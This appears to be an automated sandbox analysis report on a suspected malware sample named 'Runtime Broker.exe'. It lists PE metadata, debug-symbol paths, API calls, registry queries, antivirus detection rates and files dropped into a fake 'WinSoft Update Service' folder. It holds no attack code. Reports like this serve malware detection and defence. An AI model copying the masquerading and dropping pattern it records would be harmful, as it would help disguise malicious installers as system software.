Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: python3.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePyISAPI_loader.dll0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMFC140U.DLL^ vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMFCM140U.DLL^ vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameScintilla.DLL4 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewin32ui.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamewin32uiole.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamepythoncom37.dll0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamepywintypes37.dll0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameadsi.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameauthorization.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaxcontrol.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaxdebug.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaxscript.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamebits.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedirectsound.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameifilter.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameinternet.pyd0 vs Runtime Broker.exe
Source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemapi.pyd0 vs Runtime Broker.exe

Source: Runtime Broker.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtime Broker.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Runtime Broker.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: python.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: python.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pythonw.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pythonw.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mfc140u.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tk86t.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tk86t.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tk86t.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Runtime Broker.exe

Code function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004035D8

Source: C:\Users\user\Desktop\Runtime Broker.exe

Code function: 0_2_00406C5B

0_2_00406C5B

Source: Runtime Broker.exe	Virustotal: Detection: 36%
Source: Runtime Broker.exe	ReversingLabs: Detection: 33%

Source: C:\Users\user\Desktop\Runtime Broker.exe

File read: C:\Users\user\Desktop\Runtime Broker.exe

Jump to behavior

Source: Runtime Broker.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Runtime Broker.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

0_2_004035D8

Source: C:\Users\user\Desktop\Runtime Broker.exe

File created: C:\Program Files (x86)\WinSoft Update Service

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

File created: C:\Users\user\AppData\Local\Temp\nsw1FC2.tmp

Jump to behavior

Source: classification engine

Classification label: mal52.winEXE@1/404@4/0

Source: C:\Users\user\Desktop\Runtime Broker.exe

Code function: 0_2_004021A2 CoCreateInstance,

0_2_004021A2

Source: C:\Users\user\Desktop\Runtime Broker.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Runtime Broker.exe

Code function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404983

Source: Runtime Broker.exe

Static file information: File size 18595672 > 1048576

Source: Runtime Broker.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\A\18\s\PCbuild\win32\_asyncio.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axscript.pdb1" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\authorization.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: MFCM140U.i386.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\PyISAPI_loader.pdb source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_ssl.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axscript.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_lzma.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Heap-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: debugger_parent=pdb.Pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32ui.pdbP source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axdebug.pdbM! source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\directsound.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_decimal.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_elementtree.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_multiprocessing.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pywintypes.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_decimal.pdb%% source: nsg2001.tmp.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_tkinter.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\ifilter.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-LibraryLoader-L1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Memory-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\PyISAPI_loader.pdb! source: Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\bits.pdb+ source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axdebug.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\directsound.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_ctypes.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axcontrol.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\axcontrol.pdb3" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\6\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_queue.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32uiole.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\internet.pdb/% source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\mapi.pdb9 source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pythoncom.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Memory-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Heap-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32ui.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_msi.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_sqlite3.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-File-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pythoncom.pdb},# source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-File-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Console-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\mapi.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\adsi.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: API-MS-Win-Core-ErrorHandling-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1g 21 Apr 2020built on: Fri Jun 12 19:53:43 2020 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Debug-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: API-MS-Win-Core-Interlocked-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\_bz2.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\bits.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\adsi.pdb* source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_overlapped.pdb source: _overlapped.pyd.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-LibraryLoader-L1-1-0.pdb3 source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr, nsg2001.tmp.0.dr
Source:	Binary string: C:\A\18\s\PCbuild\win32\python37.pdb source: python37.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: C:\A\6\b\libssl-1_1.pdb@@ source: libssl-1_1.dll.0.dr
Source:	Binary string: API-MS-Win-Core-ErrorHandling-L1-1-0.pdb source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\pywintypes.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\win32\_lzma.pdbOO source: nsg2001.tmp.0.dr
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\win32uiole.pdb,&" source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win32-3.7\Release\internet.pdb source: Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp
Source:	Binary string: API-MS-Win-Core-Console-L1-1-0.pdb source: nsg2001.tmp.0.dr

Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: vcruntime140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\python.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\python37.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\pythonw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Runtime Broker.exe	File created: C:\Program Files (x86)\WinSoft Update Service\tk86t.dll	Jump to dropped file
